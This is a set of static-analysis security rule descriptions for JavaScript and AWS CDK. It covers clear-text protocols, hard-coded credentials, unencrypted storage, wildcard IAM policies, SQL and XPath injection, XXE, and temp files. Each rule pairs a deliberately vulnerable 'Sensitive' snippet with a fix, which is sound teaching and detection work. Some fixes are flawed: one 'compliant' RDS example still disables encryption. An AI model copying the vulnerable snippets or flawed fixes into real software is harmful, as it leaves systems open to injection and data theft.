Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

url = "http://example.com"; // Sensitive
url = "ftp://anonymous@example.com"; // Sensitive
url = "telnet://anonymous@example.com"; // Sensitive

For nodemailer:

const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({
  secure: false, // Sensitive
  requireTLS: false // Sensitive
});
const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({}); // Sensitive

For ftp:

var Client = require('ftp');
var c = new Client();
c.connect({
  'secure': false // Sensitive
});

For telnet-client:

const Telnet = require('telnet-client'); // Sensitive

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationLoadBalancer:

import { ApplicationLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const alb = new ApplicationLoadBalancer(this, 'ALB', {
  vpc: vpc,
  internetFacing: true
});

alb.addListener('listener-http-default', {
  port: 8080,
  open: true
}); // Sensitive

alb.addListener('listener-http-explicit', {
  protocol: ApplicationProtocol.HTTP, // Sensitive
  port: 8080,
  open: true
});

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationListener:

import { ApplicationListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new ApplicationListener(this, 'listener-http-explicit-constructor', {
  loadBalancer: alb,
  protocol: ApplicationProtocol.HTTP, // Sensitive
  port: 8080,
  open: true
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkLoadBalancer:

import { NetworkLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const nlb = new NetworkLoadBalancer(this, 'nlb', {
  vpc: vpc,
  internetFacing: true
});

var listenerNLB = nlb.addListener('listener-tcp-default', {
  port: 1234
}); // Sensitive

listenerNLB = nlb.addListener('listener-tcp-explicit', {
  protocol: Protocol.TCP, // Sensitive
  port: 1234
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkListener:

import { NetworkListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new NetworkListener(this, 'listener-tcp-explicit-constructor', {
  loadBalancer: nlb,
  protocol: Protocol.TCP, // Sensitive
  port: 8080
});

For aws-cdk-lib.aws-elasticloadbalancingv2.CfnListener:

import { CfnListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new CfnListener(this, 'listener-http', {
  defaultActions: defaultActions,
  loadBalancerArn: alb.loadBalancerArn,
  protocol: "HTTP", // Sensitive
  port: 80
});

new CfnListener(this, 'listener-tcp', {
  defaultActions: defaultActions,
  loadBalancerArn: alb.loadBalancerArn,
  protocol: "TCP", // Sensitive
  port: 80
});

For aws-cdk-lib.aws-elasticloadbalancing.CfnLoadBalancer:

import { CfnLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancing';

new CfnLoadBalancer(this, 'elb-tcp', {
  listeners: [{
    instancePort: '1000',
    loadBalancerPort: '1000',
    protocol: 'tcp' // Sensitive
  }]
});

new CfnLoadBalancer(this, 'elb-http', {
  listeners: [{
    instancePort: '1000',
    loadBalancerPort: '1000',
    protocol: 'http' // Sensitive
  }]
});

For aws-cdk-lib.aws-elasticloadbalancing.LoadBalancer:

import { LoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancing';

const loadBalancer = new LoadBalancer(this, 'elb-tcp-dict', {
    vpc,
    internetFacing: true,
    healthCheck: {
    port: 80,
    },
    listeners: [
    {
        externalPort:10000,
        externalProtocol: LoadBalancingProtocol.TCP, // Sensitive
        internalPort:10000
    }]
});

loadBalancer.addListener({
  externalPort:10001,
  externalProtocol:LoadBalancingProtocol.TCP, // Sensitive
  internalPort:10001
});
loadBalancer.addListener({
  externalPort:10002,
  externalProtocol:LoadBalancingProtocol.HTTP, // Sensitive
  internalPort:10002
});

For aws-cdk-lib.aws-elasticache.CfnReplicationGroup:

import { CfnReplicationGroup } from 'aws-cdk-lib/aws-elasticache';

new CfnReplicationGroup(this, 'unencrypted-implicit', {
  replicationGroupDescription: 'exampleDescription'
}); // Sensitive

new CfnReplicationGroup(this, 'unencrypted-explicit', {
  replicationGroupDescription: 'exampleDescription',
  transitEncryptionEnabled: false // Sensitive
});

For aws-cdk-lib.aws-kinesis.CfnStream:

import { CfnStream } from 'aws-cdk-lib/aws-kinesis';

new CfnStream(this, 'cfnstream-implicit-unencrytped', undefined); // Sensitive

new CfnStream(this, 'cfnstream-explicit-unencrytped', {
  streamEncryption: undefined // Sensitive
});

For aws-cdk-lib.aws-kinesis.Stream:

import { Stream } from 'aws-cdk-lib/aws-kinesis';

new Stream(this, 'stream-explicit-unencrypted', {
  encryption: StreamEncryption.UNENCRYPTED // Sensitive
});

Compliant Solution

url = "https://example.com";
url = "sftp://anonymous@example.com";
url = "ssh://anonymous@example.com";

For nodemailer one of the following options must be set:

const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({
  secure: true,
  requireTLS: true,
  port: 465,
  secured: true
});

For ftp:

var Client = require('ftp');
var c = new Client();
c.connect({
  'secure': true
});

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationLoadBalancer:

import { ApplicationLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const alb = new ApplicationLoadBalancer(this, 'ALB', {
  vpc: vpc,
  internetFacing: true
});

alb.addListener('listener-https-explicit', {
  protocol: ApplicationProtocol.HTTPS,
  port: 8080,
  open: true,
  certificates: [certificate]
});

alb.addListener('listener-https-implicit', {
  port: 8080,
  open: true,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationListener:

import { ApplicationListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new ApplicationListener(this, 'listener-https-explicit', {
  loadBalancer: loadBalancer,
  protocol: ApplicationProtocol.HTTPS,
  port: 8080,
  open: true,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkLoadBalancer:

import { NetworkLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const nlb = new NetworkLoadBalancer(this, 'nlb', {
  vpc: vpc,
  internetFacing: true
});

nlb.addListener('listener-tls-explicit', {
  protocol: Protocol.TLS,
  port: 1234,
  certificates: [certificate]
});

nlb.addListener('listener-tls-implicit', {
  port: 1234,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkListener:

import { NetworkListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new NetworkListener(this, 'listener-tls-explicit', {
  loadBalancer: loadBalancer,
  protocol: Protocol.TLS,
  port: 8080,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.CfnListener:

import { CfnListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new CfnListener(this, 'listener-https', {
  defaultActions: defaultActions,
  loadBalancerArn: loadBalancerArn,
  protocol: "HTTPS",
  port: 80
  certificates: [certificate]
});

new CfnListener(this, 'listener-tls', {
  defaultActions: defaultActions,
  loadBalancerArn: loadBalancerArn,
  protocol: "TLS",
  port: 80
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancing.CfnLoadBalancer:

import { CfnLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancing';

new CfnLoadBalancer(this, 'elb-ssl', {
  listeners: [{
    instancePort: '1000',
    loadBalancerPort: '1000',
    protocol: 'ssl',
    sslCertificateId: sslCertificateId
  }]
});

new CfnLoadBalancer(this, 'elb-https', {
  listeners: [{
    instancePort: '1000',
    loadBalancerPort: '1000',
    protocol: 'https',
    sslCertificateId: sslCertificateId
  }]
});

For aws-cdk-lib.aws-elasticloadbalancing.LoadBalancer:

import { LoadBalancer, LoadBalancingProtocol } from 'aws-cdk-lib/aws-elasticloadbalancing';

const lb = new LoadBalancer(this, 'elb-ssl', {
  vpc,
  internetFacing: true,
  healthCheck: {
    port: 80,
  },
  listeners: [
    {
      externalPort:10000,
      externalProtocol:LoadBalancingProtocol.SSL,
      internalPort:10000
    }]
});

lb.addListener({
  externalPort:10001,
  externalProtocol:LoadBalancingProtocol.SSL,
  internalPort:10001
});
lb.addListener({
  externalPort:10002,
  externalProtocol:LoadBalancingProtocol.HTTPS,
  internalPort:10002
});

For aws-cdk-lib.aws-elasticache.CfnReplicationGroup:

import { CfnReplicationGroup } from 'aws-cdk-lib/aws-elasticache';

new CfnReplicationGroup(this, 'encrypted-explicit', {
  replicationGroupDescription: 'example',
  transitEncryptionEnabled: true
});

For aws-cdk-lib.aws-kinesis.Stream:

import { Stream } from 'aws-cdk-lib/aws-kinesis';

new Stream(this, 'stream-implicit-encrypted');

new Stream(this, 'stream-explicit-encrypted-selfmanaged', {
  encryption: StreamEncryption.KMS,
  encryptionKey: encryptionKey,
});

new Stream(this, 'stream-explicit-encrypted-managed', {
  encryption: StreamEncryption.MANAGED
});

For aws-cdk-lib.aws-kinesis.CfnStream:

import { CfnStream } from 'aws-cdk-lib/aws-kinesis';

new CfnStream(this, 'cfnstream-explicit-encrypted', {
  streamEncryption: {
    encryptionType: encryptionType,
    keyId: encryptionKey.keyId,
  }
});

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

javascript:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

var mysql = require('mysql');

var connection = mysql.createConnection(
{
  host:'localhost',
  user: "admin",
  database: "project",
  password: "mypassword", // sensitive
  multipleStatements: true
});

connection.connect();

Compliant Solution

var mysql = require('mysql');

var connection = mysql.createConnection({
  host: process.env.MYSQL_URL,
  user: process.env.MYSQL_USERNAME,
  password: process.env.MYSQL_PASSWORD,
  database: process.env.MYSQL_DATABASE
});
connection.connect();

See

javascript:S6303

Using unencrypted RDS DB resources exposes data to unauthorized access.
This includes database data, logs, automatic backups, read replicas, snapshots, and cluster metadata.

This situation can occur in a variety of scenarios, such as:

  • A malicious insider working at the cloud provider gains physical access to the storage device.
  • Unknown attackers penetrate the cloud provider’s logical infrastructure and systems.

After a successful intrusion, the underlying applications are exposed to:

  • theft of intellectual property and/or personal data
  • extortion
  • denial of services and security bypasses via data corruption or deletion

AWS-managed encryption at rest reduces this risk with a simple switch.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to enable encryption at rest on any RDS DB resource, regardless of the engine.
In any case, no further maintenance is required as encryption at rest is fully managed by AWS.

Sensitive Code Example

For aws-cdk-lib.aws_rds.CfnDBCluster:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBCluster(this, 'example', {
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.CfnDBInstance:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBInstance(this, 'example', {
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseCluster:

import { aws_rds as rds } from 'aws-cdk-lib';
import { aws_ec2 as ec2 } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

const cluster = new rds.DatabaseCluster(this, 'example', {
  engine: rds.DatabaseClusterEngine.auroraMysql({ version: rds.AuroraMysqlEngineVersion.VER_2_08_1 }),
  instanceProps: {
    vpcSubnets: {
      subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS,
    },
    vpc,
  },
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseClusterFromSnapshot:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseClusterFromSnapshot(this, 'example', {
  engine: rds.DatabaseClusterEngine.aurora({ version: rds.AuroraEngineVersion.VER_1_22_2 }),
  instanceProps: {
    vpc,
  },
  snapshotIdentifier: 'exampleSnapshot',
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseInstance:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseInstance(this, 'example', {
  engine: rds.DatabaseInstanceEngine.POSTGRES,
  vpc,
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseInstanceReadReplica:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const sourceInstance: rds.DatabaseInstance;

new rds.DatabaseInstanceReadReplica(this, 'example', {
  sourceDatabaseInstance: sourceInstance,
  instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.LARGE),
  vpc,
  storageEncrypted: false, // Sensitive
});

Compliant Solution

For aws-cdk-lib.aws_rds.CfnDBCluster:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBCluster(this, 'example', {
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.CfnDBInstance:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBInstance(this, 'example', {
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.DatabaseCluster:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

const cluster = new rds.DatabaseCluster(this, 'example', {
  engine: rds.DatabaseClusterEngine.auroraMysql({ version: rds.AuroraMysqlEngineVersion.VER_2_08_1 }),
  instanceProps: {
    vpcSubnets: {
      subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS,
    },
    vpc,
  },
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseClusterFromSnapshot:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseClusterFromSnapshot(this, 'example', {
  engine: rds.DatabaseClusterEngine.aurora({ version: rds.AuroraEngineVersion.VER_1_22_2 }),
  instanceProps: {
    vpc,
  },
  snapshotIdentifier: 'exampleSnapshot',
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.DatabaseInstance:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseInstance(this, 'example', {
  engine: rds.DatabaseInstanceEngine.POSTGRES,
  vpc,
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.DatabaseInstanceReadReplica:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const sourceInstance: rds.DatabaseInstance;

new rds.DatabaseInstanceReadReplica(this, 'example', {
  sourceDatabaseInstance: sourceInstance,
  instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.LARGE),
  vpc,
  storageEncrypted: true,
});

See

javascript:S6302

A policy that grants all permissions may indicate an improper access control, which violates the principle of least privilege. Suppose an identity is granted full permissions to a resource even though it only requires read permission to work as expected. In this case, an unintentional overwriting of resources may occur and therefore result in loss of information.

Ask Yourself Whether

Identities obtaining all the permissions:

  • only require a subset of these permissions to perform the intended function.
  • have monitored activity showing that only a subset of these permissions is actually used.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e. by only granting the necessary permissions to identities. A good practice is to start with the very minimum set of permissions and to refine the policy over time. In order to fix overly permissive policies already deployed in production, a strategy could be to review the monitored activity in order to reduce the set of permissions to those most used.

Sensitive Code Example

A customer-managed policy that grants all permissions by using the wildcard (*) in the Action property:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["*"], // Sensitive
    resources: ["arn:aws:iam:::user/*"],
})

Compliant Solution

A customer-managed policy that grants only the required permissions:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["iam:GetAccountSummary"],
    resources: ["arn:aws:iam:::user/*"],
})

See

javascript:S6308

Amazon OpenSearch Service is a managed service to host OpenSearch instances. It replaces Elasticsearch Service, which has been deprecated.

To harden domain (cluster) data in case of unauthorized access, OpenSearch provides data-at-rest encryption if the engine is OpenSearch (any version), or Elasticsearch with a version of 5.1 or above. Enabling encryption at rest will help protect:

  • indices
  • logs
  • swap files
  • data in the application directory
  • automated snapshots

Thus, adversaries cannot access the data if they gain physical access to the storage medium.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to encrypt OpenSearch domains that contain sensitive information.

OpenSearch handles encryption and decryption transparently, so no further modifications to the application are necessary.

Sensitive Code Example

For aws-cdk-lib.aws_opensearchservice.Domain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleDomain = new opensearchservice.Domain(this, 'ExampleDomain', {
  version: EngineVersion.OPENSEARCH_1_3,
}); // Sensitive, encryption must be explicitly enabled

For aws-cdk-lib.aws_opensearchservice.CfnDomain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleCfnDomain = new opensearchservice.CfnDomain(this, 'ExampleCfnDomain', {
  engineVersion: 'OpenSearch_1.3',
}); // Sensitive, encryption must be explicitly enabled

Compliant Solution

For aws-cdk-lib.aws_opensearchservice.Domain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleDomain = new opensearchservice.Domain(this, 'ExampleDomain', {
  version: EngineVersion.OPENSEARCH_1_3,
  encryptionAtRest: {
    enabled: true,
  },
});

For aws-cdk-lib.aws_opensearchservice.CfnDomain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleCfnDomain = new opensearchservice.CfnDomain(this, 'ExampleCfnDomain', {
  engineVersion: 'OpenSearch_1.3',
  encryptionAtRestOptions: {
    enabled: true,
  },
});

See

javascript:S5691

Hidden files are created automatically by many tools to save user-preferences, well-known examples are .profile, .bashrc, .bash_history or .git. To simplify the view these files are not displayed by default using operating system commands like ls.

Outside of the user environment, hidden files are sensitive because they are used to store privacy-related information or even hard-coded secrets.

Ask Yourself Whether

  • Hidden files may have been inadvertently uploaded to the static server’s public directory and it accepts requests to hidden files.
  • There is no business use cases linked to serve files in .name format but the server is not configured to reject requests to this type of files.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Disable the serving of hidden files.

Sensitive Code Example

Express.js serve-static middleware:

let serveStatic = require("serve-static");
let app = express();
let serveStaticMiddleware = serveStatic('public', { 'index': false, 'dotfiles': 'allow'});   // Sensitive
app.use(serveStaticMiddleware);

Compliant Solution

Express.js serve-static middleware:

let serveStatic = require("serve-static");
let app = express();
let serveStaticMiddleware = serveStatic('public', { 'index': false, 'dotfiles': 'ignore'});   // Compliant: ignore or deny are recommended values
let serveStaticDefault = serveStatic('public', { 'index': false});   // Compliant: by default, "dotfiles" (file or directory that begins with a dot) are not served (with the exception that files within a directory that begins with a dot are not ignored), see serve-static module documentation
app.use(serveStaticMiddleware);

See

javascript:S5693

Rejecting requests with significant content length is a good practice to control the network traffic intensity and thus resource consumption in order to prevents DoS attacks.

Ask Yourself Whether

  • size limits are not defined for the different resources of the web application.
  • the web application is not protected by rate limiting features.
  • the web application infrastructure has limited resources.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For most of the features of an application, it is recommended to limit the size of requests to:
    • lower or equal to 8mb for file uploads.
    • lower or equal to 2mb for other requests.

It is recommended to customize the rule with the limit values that correspond to the web application.

Sensitive Code Example

formidable file upload module:

const form = new Formidable();
form.maxFileSize = 10000000; // Sensitive: 10MB is more than the recommended limit of 8MB

const formDefault = new Formidable(); // Sensitive, the default value is 200MB

multer (Express.js middleware) file upload module:

let diskUpload = multer({
  storage: diskStorage,
  limits: {
    fileSize: 10000000; // Sensitive: 10MB is more than the recommended limit of 8MB
  }
});

let diskUploadUnlimited = multer({ // Sensitive: the default value is no limit
  storage: diskStorage,
});

body-parser module:

// 4MB is more than the recommended limit of 2MB for non-file-upload requests
let jsonParser = bodyParser.json({ limit: "4mb" }); // Sensitive
let urlencodedParser = bodyParser.urlencoded({ extended: false, limit: "4mb" }); // Sensitive

Compliant Solution

formidable file upload module:

const form = new Formidable();
form.maxFileSize = 8000000; // Compliant: 8MB

multer (Express.js middleware) file upload module:

let diskUpload = multer({
  storage: diskStorage,
  limits: {
     fileSize: 8000000 // Compliant: 8MB
  }
});

body-parser module:

let jsonParser = bodyParser.json(); // Compliant, when the limit is not defined, the default value is set to 100kb
let urlencodedParser = bodyParser.urlencoded({ extended: false, limit: "2mb" }); // Compliant

See

javascript:S2077

Formatted SQL queries can be difficult to maintain, debug and can increase the risk of SQL injection when concatenating untrusted values into the query. However, this rule doesn’t detect SQL injections (unlike rule S3649), the goal is only to highlight complex/formatted queries.

Ask Yourself Whether

  • Some parts of the query come from untrusted values (like user inputs).
  • The query is repeated/duplicated in other parts of the code.
  • The application must support different types of relational databases.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Sensitive Code Example

// === MySQL ===
const mysql = require('mysql');
const mycon = mysql.createConnection({ host: host, user: user, password: pass, database: db });
mycon.connect(function(err) {
  mycon.query('SELECT * FROM users WHERE id = ' + userinput, (err, res) => {}); // Sensitive
});

// === PostgreSQL ===
const pg = require('pg');
const pgcon = new pg.Client({ host: host, user: user, password: pass, database: db });
pgcon.connect();
pgcon.query('SELECT * FROM users WHERE id = ' + userinput, (err, res) => {}); // Sensitive

Compliant Solution

// === MySQL ===
const mysql = require('mysql');
const mycon = mysql.createConnection({ host: host, user: user, password: pass, database: db });
mycon.connect(function(err) {
  mycon.query('SELECT name FROM users WHERE id = ?', [userinput], (err, res) => {});
});

// === PostgreSQL ===
const pg = require('pg');
const pgcon = new pg.Client({ host: host, user: user, password: pass, database: db });
pgcon.connect();
pgcon.query('SELECT name FROM users WHERE id = $1', [userinput], (err, res) => {});

Exceptions

This rule’s current implementation does not follow variables. It will only detect SQL queries which are formatted directly in the function call.

const sql = 'SELECT * FROM users WHERE id = ' + userinput;
mycon.query(sql, (err, res) => {}); // Sensitive but no issue is raised.

See

javascript:S4817

This rule is deprecated, and will eventually be removed.

Executing XPATH expressions is security-sensitive. It has led in the past to the following vulnerabilities:

User-provided data such as URL parameters should always be considered as untrusted and tainted. Constructing XPath expressions directly from tainted data enables attackers to inject specially crafted values that changes the initial meaning of the expression itself. Successful XPath injections attacks can read sensitive information from the XML document.

Ask Yourself Whether

  • the XPATH expression might contain some unsafe input coming from a user.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize any user input before using it in an XPATH expression.

Sensitive Code Example

// === Server side ===

var xpath = require('xpath');
var xmldom = require('xmldom');

var doc = new xmldom.DOMParser().parseFromString(xml);
var nodes = xpath.select(userinput, doc); // Sensitive
var node = xpath.select1(userinput, doc); // Sensitive
// === Client side ===

// Chrome, Firefox, Edge, Opera, and Safari use the evaluate() method to select nodes:
var nodes = document.evaluate(userinput, xmlDoc, null, XPathResult.ANY_TYPE, null); // Sensitive

// Internet Explorer uses its own methods to select nodes:
var nodes = xmlDoc.selectNodes(userinput); // Sensitive
var node = xmlDoc.SelectSingleNode(userinput); // Sensitive

See

javascript:S4818

This rule is deprecated, and will eventually be removed.

Using sockets is security-sensitive. It has led in the past to the following vulnerabilities:

Sockets are vulnerable in multiple ways:

  • They enable a software to interact with the outside world. As this world is full of attackers it is necessary to check that they cannot receive sensitive information or inject dangerous input.
  • The number of sockets is limited and can be exhausted. Which makes the application unresponsive to users who need additional sockets.

This rules flags code that creates sockets. It matches only the direct use of sockets, not use through frameworks or high-level APIs such as the use of http connections.

Ask Yourself Whether

  • sockets are created without any limit every time a user performs an action.
  • input received from sockets is used without being sanitized.
  • sensitive data is sent via sockets without being encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • In many cases there is no need to open a socket yourself. Use instead libraries and existing protocols.
  • Encrypt all data sent if it is sensitive. Usually it is better to encrypt it even if the data is not sensitive as it might change later.
  • Sanitize any input read from the socket.
  • Limit the number of sockets a given user can create. Close the sockets as soon as possible.

Sensitive Code Example

const net = require('net');

var socket = new net.Socket(); // Sensitive
socket.connect(80, 'google.com');

// net.createConnection creates a new net.Socket, initiates connection with socket.connect(), then returns the net.Socket that starts the connection
net.createConnection({ port: port }, () => {}); // Sensitive

// net.connect is an alias to net.createConnection
net.connect({ port: port }, () => {}); // Sensitive

See

javascript:S6319

Amazon SageMaker is a managed machine learning service in a hosted production-ready environment. To train machine learning models, SageMaker instances can process potentially sensitive data, such as personal information that should not be stored unencrypted. In the event that adversaries physically access the storage media, they cannot decrypt encrypted data.

Ask Yourself Whether

  • The instance contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SageMaker notebook instances that contain sensitive information. Encryption and decryption are handled transparently by SageMaker, so no further modifications to the application are necessary.

Sensitive Code Example

For aws-cdk-lib.aws-sagemaker.CfnNotebookInstance

import { CfnNotebookInstance } from 'aws-cdk-lib/aws-sagemaker';

new CfnNotebookInstance(this, 'example', {
      instanceType: 'instanceType',
      roleArn: 'roleArn'
}); // Sensitive

Compliant Solution

For aws-cdk-lib.aws-sagemaker.CfnNotebookInstance

import { CfnNotebookInstance } from 'aws-cdk-lib/aws-sagemaker';

const encryptionKey = new Key(this, 'example', {
    enableKeyRotation: true,
});
new CfnNotebookInstance(this, 'example', {
    instanceType: 'instanceType',
    roleArn: 'roleArn',
    kmsKeyId: encryptionKey.keyId
});

See

javascript:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in libxmljs

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

var libxmljs = require('libxmljs');
var fs = require('fs');

var xml = fs.readFileSync('xxe.xml', 'utf8');
libxmljs.parseXmlString(xml, {
    noblanks: true,
    noent: true, // Noncompliant
    nocdata: true
});

Compliant solution

parseXmlString is safe by default.

var libxmljs = require('libxmljs');
var fs = require('fs');

var xml = fs.readFileSync('xxe.xml', 'utf8');
libxmljs.parseXmlString(xml);

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.

Resources

Standards

javascript:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas like /tmp in Linux based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

In the past, it has led to the following vulnerabilities:

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see examples bellow). It also detects access to environment variables that point to publicly writable directories, e.g., TMP and TMPDIR.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a dedicated sub-folder with tightly controlled permissions
  • Use secure-by-design APIs to create temporary files. Such API will make sure:
    • The generated filename is unpredictable
    • The file is readable and writable only by the creating user ID
    • The file descriptor is not inherited by child processes
